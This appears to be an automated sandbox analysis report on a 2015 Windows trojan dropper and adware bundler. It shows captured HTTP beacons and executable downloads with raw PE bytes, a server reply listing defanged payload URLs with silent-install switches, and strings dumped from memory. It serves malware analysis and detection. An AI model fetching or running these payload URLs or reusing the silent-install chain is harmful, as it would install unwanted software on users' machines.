GET /installer.gif?action=started&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&os=XP32&chver=X&ffver=X&iever=6&app=12345&srcid=003266&default=ie&ver=107&crtnm=OralTeams&rnd=2429 HTTP/1.1

Accept: */*

Host: mystats.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: mXR3Zv54paTqJBf4qr 24bc7PrHE5vdig1qWUI 5Nl4UX8Uq/RlZBnbwJwjtrHFH

x-amz-request-id: 3BD68FC8F05BE975

Date: Thu, 29 Oct 2015 07:31:07 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Wed, 17 Jun 2015 13:20:41 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: mXR3Zv54paTqJBf4qr 24bc7PrHE5vdig1qWUI 5Nl4UX8Uq/RlZBnbwJwjtrHFH..x-amz-request-id: 3BD68FC8F05BE975..Date: Thu, 29 Oct 2015 07:31:07 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:41 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;..

GET /data.gif?app=12345&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=4&rnd=8792 HTTP/1.1

Accept: */*

Host: logs.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Thu, 29 Oct 2015 07:31:27 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1389114507"

Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT

Cache-Control: max-age=86400

Content-Length: 35

Content-Type: image/gif

X-HW: 1446103888.dop008.am4.t,1446103887.cds063.am4.c

GIF89a.............,...........D..;..

GET /?file=bundle&v=2 HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: VVV.djapp.info

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Thu, 29 Oct 2015 07:35:03 GMT

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

Location: hXXp://drz432f7yeokb.cloudfront.net/prepreinstaller_win.exe

0..HTTP/1.1 302 Moved Temporarily..Server: nginx..Date: Thu, 29 Oct 2015 07:35:03 GMT..Content-Type: text/html; charset=UTF-8..Transfer-Encoding: chunked..Connection: keep-alive..Location: hXXp://drz432f7yeokb.cloudfront.net/prepreinstaller_win.exe..0..

GET /prepreinstaller_win.exe HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: drz432f7yeokb.cloudfront.net

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Content-Type: application/octet-stream

Content-Length: 299008

Connection: keep-alive

Date: Wed, 28 Oct 2015 13:52:38 GMT

Last-Modified: Wed, 28 Oct 2015 13:33:07 GMT

ETag: "8574ef2796bdf5b7c82ae981831e45a5"

Accept-Ranges: bytes

Server: AmazonS3

Age: 63516

X-Cache: Hit from cloudfront

Via: 1.1 73a3bce79e63d88b3a25c9ced0be16f5.cloudfront.net (CloudFront)

X-Amz-Cf-Id: -6ja0cLnBjey5qebGeQpqGukrT5xMEAhIGlqp0dc8rlrE_sE71TtkQ==

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......DG...&...&...&.......&....'.3&....&.}&...^...&...&..g&....#..&.......&...&...&.......&..Rich.&..........................PE..L...J.0V.............................!....... ....@.......................................@.....................................P...............................< ..................................H[..@............ ...............................text............................... ..`.rdata..\.... ......................@..@.data....3..........................@....rsrc...............................@..@.reloc..22.......4...\..............@..B..........................................................................................................................................................................................................................................................................................................................................d"B..X...V....d"B..J....D$..t.V.....Y..^...V..t.f.0f;1u.......Ju.3.^....f;.^.....@.j,.~.A........3..u....C.3..G......w..}..E.f...u..E.....;.......3..U....U..K..M....r.......f.<.=.........r...........P.E......Y..u.f.}. t.f.}./.......{..r........M.f....E..f.Du.F...u}3..|u.....E.j..E.P3..X.B......Ff.....|..E..M...........M.f.E..E...............f.E..E........E.3.f.E...D}..u.P.....G...|..}.3..}................j.Y;.}.3.... ...........|u.....f..3..|].....E.j..E.P3..X.B..k...Cf.....|..E..M...........M.f.E..

<<< skipped >>>

GET hXXp://events.lxhwspv.com/?p=cHViX2lkPTM1MyZzZXR1cF9pZD0xJmV4dHJhX3BhcmFtcz1TaWxlbnRJbnN0YWxsZXIgZ2xvYmFsIHN0YXJ0JmV2ZW50PTExJnNpZD02NjYmbWFjPTc3NyZhZHZfaWQ9MTI4JmJpdmVyc2lvbj0xLjg= HTTP/1.1

Host: events.lxhwspv.com

Proxy-Connection: Close

HTTP/1.1 200 OK

Server: nginx

Date: Thu, 29 Oct 2015 07:35:12 GMT

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

0..HTTP/1.1 200 OK..Server: nginx..Date: Thu, 29 Oct 2015 07:35:12 GMT..Content-Type: text/html; charset=UTF-8..Transfer-Encoding: chunked..Connection: keep-alive..0..

GET /crcb/123/installer.exe HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: dl.randkeygen.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Thu, 29 Oct 2015 07:31:05 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1440089314"

Last-Modified: Thu, 20 Aug 2015 16:48:34 GMT

Cache-Control: max-age=2750

Content-Length: 1965128

Content-Type: application/x-msdownload

X-HW: 1446103865.dop009.fr7.t,1446103865.cds020.fr7.c

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........S..............>.........q.............e...............b.......K.......r.........X.............:.......v.......?.....Rich....................PE..L......U.....................~....................@..........................p............@.......................................... ...A..............H....p..........8...........................h...@............................................text...T........................... ..`.rdata..z...........................@..@.data....0..........................@....rsrc....A... ...B..................@..@.reloc.......p......................@..B................................................................................................................................................................................................................................................................................................................U...M.V3.;.tb.A.;.t[.p..q..q..q..P.;.t.....Q0..0....0.p..p..p .p8.p<.@......Hl.HP.HL....................3.^]........^]..........U...M.3.;.t..A.;.t.Q.P(.P,.P0.^...]........]....U...M.W..tt.y...tmSV.u...y.3..........C..0}......t....|....~.^[....._]....G4..t.9w$t.P.A(.I$P...M.....G4....Q._..w$.X...^[_]........_]..........U...E.S3.;........81.......}.8......V.u.;.u.^.C.[]....^.9^ u..F ` @..^(9^$u..F$. @..F(.N Wh....j.P.......;.u._^.....[]....U.R.~.V._4.........t..F(.N$WP......F....._^..[]........[].......

<<< skipped >>>

GET /cmmdWriter.exe HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: d2fpsq9kg43yka.cloudfront.net

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Content-Type: application/x-msdownload

Content-Length: 42851

Connection: keep-alive

Date: Thu, 29 Oct 2015 00:08:07 GMT

Last-Modified: Thu, 29 Oct 2015 00:00:47 GMT

ETag: "8217fb536a761fb752904d84de9e773f"

Accept-Ranges: bytes

Server: AmazonS3

Age: 26572

X-Cache: Hit from cloudfront

Via: 1.1 bc6c3158b6c70458bf3fc3895b89eba6.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 5O2Rd4xRZ0In7qGU1v8eRQDi9BwMg7Q4fu0zM0CIW27luUEd7XgzMQ==

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................Z...........0.......p....@..........................................................................s.......p...............................................................................p...............................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data...x............p..............@....ndata...0...@...........................rsrc........p.......t..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[...U.

<<< skipped >>>

GET /utility.gif?app=12345&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&ver=106&os=XP32&browser=&campaign=003040&browserver=106&country=&error=na&action=mutex_already_exists&report=cberr&rnd=1906 HTTP/1.1

Accept: */*

Host: err.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: tek0gZGW6yv/cIzPEe JD88ru9T9yemmHz2mfhJn8ZDdIIrlxuMdIDdKqaQlL5sGHGTHflG7itk=

x-amz-request-id: 4EEDCB9AF6B7531D

Date: Thu, 29 Oct 2015 07:31:22 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: tek0gZGW6yv/cIzPEe JD88ru9T9yemmHz2mfhJn8ZDdIIrlxuMdIDdKqaQlL5sGHGTHflG7itk=..x-amz-request-id: 4EEDCB9AF6B7531D..Date: Thu, 29 Oct 2015 07:31:22 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;..

GET /data.gif?app=12345&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=3&rnd=6474 HTTP/1.1

Accept: */*

Host: logs.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Thu, 29 Oct 2015 07:31:05 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1389114507"

Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT

Cache-Control: max-age=86400

Content-Length: 35

Content-Type: image/gif

X-HW: 1446103866.dop017.am4.t,1446103865.cds063.am4.c

GIF89a.............,...........D..;HTTP/1.1 200 OK..Date: Thu, 29 Oct 2015 07:31:05 GMT..Keep-Alive: timeout=10, max=100..Connection: Keep-Alive..Accept-Ranges: bytes..ETag: "1389114507"..Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT..Cache-Control: max-age=86400..Content-Length: 35..Content-Type: image/gif..X-HW: 1446103866.dop017.am4.t,1446103865.cds063.am4.c..GIF89a.............,...........D..;..

GET /SilentInstaller_dotnet4.exe HTTP/1.1

Host: drz432f7yeokb.cloudfront.net

HTTP/1.1 200 OK

Content-Type: application/octet-stream

Content-Length: 334336

Connection: keep-alive

Date: Wed, 28 Oct 2015 13:52:41 GMT

Last-Modified: Wed, 28 Oct 2015 13:26:05 GMT

ETag: "a46fd47af97a4430b0fa9ad56eb856d4"

Accept-Ranges: bytes

Server: AmazonS3

Age: 63513

X-Cache: Hit from cloudfront

Via: 1.1 bc6c3158b6c70458bf3fc3895b89eba6.cloudfront.net (CloudFront)

X-Amz-Cf-Id: erc3bw92p3cz5ig1KaVO3-2gxoJVoaIGMXSfaILjKbwyZAi827ECjQ==

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....0V............................n&... ........@.. ....................................@..................................&..O....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P&......H...........To..........T...@ ...........................................(k...*..~....*...(....*Vs....(....t.........*....*.....N(....&*2..(....&..Z*....0..........(m.....c.d(....&..(......*..2..(....&..Z*....0..........(n.....c.d(....&..(......*..2..(....&..Z*....0..........(o.....c.d(....&..(......*..2..(....&..Z*....0..........(p.....c.d(....&..(......*..2..(....&..Z*....0..........(q.....c.d(....&..(......*..2..(....&..Z*....0..........(r.....c.d(....&..(......*..2..(....&..Z*....0..........(s.....c.d(....&..(......*..2..(....&..Z*....0..........(t.....c.d(....&..(......*..2..(....&..Z*....0..........(u.....c.d(....&..(......*..2..(....&..Z*....0..........(v.....c.d(....&..(......*..2..(....&..Z*....0..........(w.....c.d(....&..(......*..2..(....&..Z*....0..........(x.....c.d(....&..(......*..2..(....&..Z*....0..........(y.....c.d(....&..(......*..2..( ...&..Z*....0..........(z.....c.d(!...&..(......*..2..("...&..Z*....0..........({.....c.d(#...&..(......*..2..($...&..Z*....0..........(|.....c.d(%

<<< skipped >>>

GET /Generic/vos.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk= HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: livestatscounter.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx/1.8.0

Date: Thu, 29 Oct 2015 07:30:58 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.5.24

429..hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe.. /md=2 /v=som-tot-jot-cra-opw-crb-crr..hXXp://livestatscounter.com/SysInfo/validator/timer.php..hXXp://dl.staticclientstorage.com/69/all/cp/row/setup.exe.. q::cCnnykR3kEQycJE x#R3E#nqxkcn:x*:n*x:QcR#*D..hXXp://dl.randkeygen.com/crcb/123/installer.exe.. /installapp..hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe.. /idn /ch=NOCHPC..hXXp://VVV.djapp.info/?file=bundle&v=2.. -pub_id=353 -adv_id=128..hXXp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe.. /ci 11612..hXXp://mobilitydata5.com/Generic/rsstracker/feed_track.php?sid=6637476637.. ..hXXp://VVV.djapp.info/?file=bundle&v=2.. -pub_id=353 -adv_id=128..hXXp://dl.taxideataxus.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe../VERYSILENT..hXXp://d10huri5h4o4a3.cloudfront.net/smt.exe..http://d10huri5h4o4a3.cloudfront.net/policyname.exe.. /vpol=som..hXXp://VVV.codec13sudha.com/download.php?l4J9dw==..hXXp://download-servers.com/SysInfo/Validate.exe.. /s..hXXp://download-servers.com/SysInfo/Validate.exe.. /s..0..HTTP/1.1 200 OK..Server: nginx/1.8.0..Date: Thu, 29 Oct 2015 07:30:58 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.5.24..429..hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe.. /md=2 /v=som-tot-jot-cra-opw-crb-crr..hXXp://livestatscounter.com/SysInfo/validator/timer.php..http://dl.staticclientstorage.com/69/all/cp/row/setup.exe.. q::cCnnykR3kEQycJE x#R3E#nqxkcn:x*:n*x:QcR#*D..hXXp://dl.randkeygen.com/crcb/

<<< skipped >>>

GET /SysInfo/validator/timer.php HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: livestatscounter.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx/1.8.0

Date: Thu, 29 Oct 2015 07:30:59 GMT

Content-Type: application/octet-stream

Content-Length: 126474

Connection: keep-alive

X-Powered-By: PHP/5.5.24

Content-Transfer-Encoding: binary

Content-Disposition: attachment; filename=LRP8nPI.exe

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................................................................t.......................................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...................................rsrc................z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....

<<< skipped >>>

Map

The Trojan connects to the servers at the folowing location(s):

Strings from Dumps

nsu5.tmp_468:

.text

.text

`.rdata

`.rdata

@.data

@.data

.ndata

.ndata

.rsrc

.rsrc

uDSSh

uDSSh

.DEFAULT\Control Panel\International

.DEFAULT\Control Panel\International

Software\Microsoft\Windows\CurrentVersion

Software\Microsoft\Windows\CurrentVersion

GetWindowsDirectoryA

GetWindowsDirectoryA

KERNEL32.dll

KERNEL32.dll

ExitWindowsEx

ExitWindowsEx

USER32.dll

USER32.dll

GDI32.dll

GDI32.dll

SHFileOperationA

SHFileOperationA

ShellExecuteA

ShellExecuteA

SHELL32.dll

SHELL32.dll

RegEnumKeyA

RegEnumKeyA

RegCreateKeyExA

RegCreateKeyExA

RegCloseKey

RegCloseKey

RegDeleteKeyA

RegDeleteKeyA

RegOpenKeyExA

RegOpenKeyExA

ADVAPI32.dll

ADVAPI32.dll

COMCTL32.dll

COMCTL32.dll

ole32.dll

ole32.dll

VERSION.dll

VERSION.dll

verifying installer: %d%%

verifying installer: %d%%

unpacking data: %d%%

unpacking data: %d%%

... %d%%

... %d%%

hXXp://nsis.sf.net/NSIS_Error

hXXp://nsis.sf.net/NSIS_Error

~nsu.tmp

~nsu.tmp

%u.%u%s%s

%u.%u%s%s

RegDeleteKeyExA

RegDeleteKeyExA

%s=%s

%s=%s

*?|/":

*?|/":

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq21.tmp -pub_id=353 -adv_id=128

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq21.tmp -pub_id=353 -adv_id=128

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsvB.tmp\inetc.dll

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsvB.tmp\inetc.dll

hXXp://VVV.djapp.info/?file=bundle&v=2

hXXp://VVV.djapp.info/?file=bundle&v=2

ysInfo/SearchUpdater.exe&errorlevel=0

ysInfo/SearchUpdater.exe&errorlevel=0

hXXp://download-servers.com/partners/360/360TotalSecurity.exe

hXXp://download-servers.com/partners/360/360TotalSecurity.exe

System.dll

System.dll

callback%d

callback%d

@.reloc

@.reloc

u.Uj@

u.Uj@

MSVCRT.dll

MSVCRT.dll

HttpSendRequestA

HttpSendRequestA

HttpSendRequestExA

HttpSendRequestExA

HttpQueryInfoA

HttpQueryInfoA

FtpCreateDirectoryA

FtpCreateDirectoryA

FtpOpenFileA

FtpOpenFileA

HttpOpenRequestA

HttpOpenRequestA

HttpAddRequestHeadersA

HttpAddRequestHeadersA

HttpEndRequestA

HttpEndRequestA

InternetCrackUrlA

InternetCrackUrlA

WININET.dll

WININET.dll

inetc.dll

inetc.dll

Open URL Error

Open URL Error

URL Parts Error

URL Parts Error

FtpCreateDir failed (550)

FtpCreateDir failed (550)

Error FTP path (550)

Error FTP path (550)

Downloading %s

Downloading %s

%dkB (%d%%) of %dkB @ %d.dkB/s

%dkB (%d%%) of %dkB @ %d.dkB/s

(%d %s%s remaining)

(%d %s%s remaining)

REST %d

REST %d

SIZE %s

SIZE %s

Content-Length: %d

Content-Length: %d

Content-Type: application/x-www-form-urlencoded

Content-Type: application/x-www-form-urlencoded

Authorization: basic %s

Authorization: basic %s

Proxy-authorization: basic %s

Proxy-authorization: basic %s

%s:%s

%s:%s

FtpCommandA

FtpCommandA

wininet.dll

wininet.dll

%u MB

%u MB

%u kB

%u kB

%u bytes

%u bytes

%d:d:d

%d:d:d

%s - %s

%s - %s

(Err=%d)

(Err=%d)

NSIS_Inetc (Mozilla)

NSIS_Inetc (Mozilla)

Filename: %s

Filename: %s

/password

/password

Uploading %s

Uploading %s

8!8-8B8I8}8

8!8-8B8I8}8

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr22.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr22.tmp

nsr22.tmp

nsr22.tmp

://livestatscounter.com/Generic/vos.php?ch=

://livestatscounter.com/Generic/vos.php?ch=

CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu5.tmp /idn

CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu5.tmp /idn

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq21.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq21.tmp

Uninstall.exe

Uninstall.exe

n.php?r=vu_vo2_

n.php?r=vu_vo2_

d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe

d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu5.tmp /idn

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu5.tmp /idn

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp

nsu5.tmp

nsu5.tmp

CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl9.tmp

CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl9.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsvB.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsvB.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu5.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu5.tmp

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://VVV.djapp.info/?file=bundle&v=2&v=2\"}"}

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://VVV.djapp.info/?file=bundle&v=2&v=2\"}"}

archUpdater.exe&errorlevel=0&v=2\"}"}

archUpdater.exe&errorlevel=0&v=2\"}"}

hXXp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

hXXp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

url=hXXp://VVV.djapp.info/?file=bundle&v=2

url=hXXp://VVV.djapp.info/?file=bundle&v=2

Info/SearchUpdater.exe

Info/SearchUpdater.exe

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nssE.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nssE.tmp

dlgen.php?r=vu_vo2_

dlgen.php?r=vu_vo2_

)-.Yln

)-.Yln

Nullsoft Install System v2.46

Nullsoft Install System v2.46

1.0.0.1

1.0.0.1

nsq21.tmp_168:

.text

.text

`.rdata

`.rdata

@.data

@.data

.rsrc

.rsrc

@.reloc

@.reloc

xSSSh

xSSSh

FTPjKS

FTPjKS

FtPj;S

FtPj;S

C.PjRV

C.PjRV

Visual C CRT: Not enough memory to complete call to strerror.

Visual C CRT: Not enough memory to complete call to strerror.

Broken pipe

Broken pipe

Inappropriate I/O control operation

Inappropriate I/O control operation

Operation not permitted

Operation not permitted

portuguese-brazilian

portuguese-brazilian

operator

operator

GetProcessWindowStation

GetProcessWindowStation

KERNEL32.dll

KERNEL32.dll

USER32.dll

USER32.dll

ADVAPI32.dll

ADVAPI32.dll

GetCPInfo

GetCPInfo

GetProcessHeap

GetProcessHeap

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq21.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq21.tmp

=v~)%F

=v~)%F

~#ÊS

~#ÊS

nKERNEL32.DLL

nKERNEL32.DLL

mscoree.dll

mscoree.dll

- Attempt to initialize the CRT more than once.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- CRT not initialized

- floating point support not loaded

- floating point support not loaded

WUSER32.DLL

WUSER32.DLL

LxHWSpv.com

LxHWSpv.com

52.1.45.42:80

52.1.45.42:80

chrome.exe_1980:

.text

.text

`.rdata

`.rdata

@.data

@.data

.rsrc

.rsrc

@.reloc

@.reloc

SHA256 block transform for x86, CRYPTOGAMS by

SHA256 block transform for x86, CRYPTOGAMS by

u.QQQQQj

u.QQQQQj

j.Yf;

j.Yf;

_tcPVj@

_tcPVj@

.PjRW

.PjRW

user32.dll

user32.dll

c:\projects\chromium_clean\src\chrome\app\chrome_exe_main_win.cc

c:\projects\chromium_clean\src\chrome\app\chrome_exe_main_win.cc

No valid Chrome version found

No valid Chrome version found

c:\projects\chromium_clean\src\chrome\app\client_util.cc

c:\projects\chromium_clean\src\chrome\app\client_util.cc

Failed to load Chrome DLL from

Failed to load Chrome DLL from

ChromeMain

ChromeMain

RelaunchChromeBrowserWithNewCommandLineIfNeeded

RelaunchChromeBrowserWithNewCommandLineIfNeeded

Could not find exported function

Could not find exported function

1.3.21.115

1.3.21.115

Chrome

Chrome

0.0.0.0-devel

0.0.0.0-devel

url-chunk

url-chunk

font_key_name

font_key_name

subresource_url

subresource_url

%s-%x

%s-%x

CHROME_MAIN_TIME

CHROME_MAIN_TIME

c:\projects\chromium_clean\src\chrome\installer\util\install_util.cc

c:\projects\chromium_clean\src\chrome\installer\util\install_util.cc

chrome-sxs

chrome-sxs

googlechromeframe

googlechromeframe

Cannot initialize AppCommands from an invalid key.

Cannot initialize AppCommands from an invalid key.

c:\projects\chromium_clean\src\chrome\installer\util\app_commands.cc

c:\projects\chromium_clean\src\chrome\installer\util\app_commands.cc

Failed to open key "

Failed to open key "

Skipping over key "

Skipping over key "

c:\projects\chromium_clean\src\chrome\installer\util\language_selector.cc

c:\projects\chromium_clean\src\chrome\installer\util\language_selector.cc

Cannot initialize an AppCommand from an invalid key.

Cannot initialize an AppCommand from an invalid key.

c:\projects\chromium_clean\src\chrome\installer\util\app_command.cc

c:\projects\chromium_clean\src\chrome\installer\util\app_command.cc

c:\projects\chromium_clean\src\chrome\app\image_pre_reader_win.cc

c:\projects\chromium_clean\src\chrome\app\image_pre_reader_win.cc

Check failed: pe_image.VerifyMagic().

Check failed: pe_image.VerifyMagic().

reinterpret_cast(section 1)

reinterpret_cast(section 1)

section == pe_image.GetImageSectionFromAddr(start)

section == pe_image.GetImageSectionFromAddr(start)

section == pe_image.GetImageSectionFromAddr(start length - 1)

section == pe_image.GetImageSectionFromAddr(start length - 1)

(0x%X)

(0x%X)

Error (0x%X) while retrieving error. (0x%X)

Error (0x%X) while retrieving error. (0x%X)

c:\projects\chromium_clean\src\base\win\scoped_handle.cc

c:\projects\chromium_clean\src\base\win\scoped_handle.cc

%s-%Iu

%s-%Iu

(%d = %3.1f%%)

(%d = %3.1f%%)

Histogram: %s recorded %d samples

Histogram: %s recorded %d samples

(flags = 0x%x)

(flags = 0x%x)

PlatformFile.UnknownErrors.Windows

PlatformFile.UnknownErrors.Windows

c:\projects\chromium_clean\src\base\pickle.cc

c:\projects\chromium_clean\src\base\pickle.cc

.thunks

.thunks

.syzygy

.syzygy

Check failed: PlatformThreadLocalStorage::AllocTLS(&key).

Check failed: PlatformThreadLocalStorage::AllocTLS(&key).

c:\projects\chromium_clean\src\base\threading\thread_local_storage.cc

c:\projects\chromium_clean\src\base\threading\thread_local_storage.cc

Check failed: PlatformThreadLocalStorage::AllocTLS(&key) && key != PlatformThreadLocalStorage::TLS_KEY_OUT_OF_INDEXES.

Check failed: PlatformThreadLocalStorage::AllocTLS(&key) && key != PlatformThreadLocalStorage::TLS_KEY_OUT_OF_INDEXES.

Check failed: !PlatformThreadLocalStorage::GetTLSValue(key).

Check failed: !PlatformThreadLocalStorage::GetTLSValue(key).

kernel32.dll

kernel32.dll

c:\projects\chromium_clean\src\sandbox\win\src\broker_services.cc

c:\projects\chromium_clean\src\sandbox\win\src\broker_services.cc

Check failed: AssociateCompletionPort(tracker->job, job_port_, tracker.get()).

Check failed: AssociateCompletionPort(tracker->job, job_port_, tracker.get()).

c:\projects\chromium_clean\src\sandbox\win\src\sandbox_policy_base.cc

c:\projects\chromium_clean\src\sandbox\win\src\sandbox_policy_base.cc

c:\projects\chromium_clean\src\sandbox\win\src\handle_closer_agent.cc

c:\projects\chromium_clean\src\sandbox\win\src\handle_closer_agent.cc

Check failed: name.second.

Check failed: name.second.

c:\projects\chromium_clean\src\sandbox\win\src\interception.cc

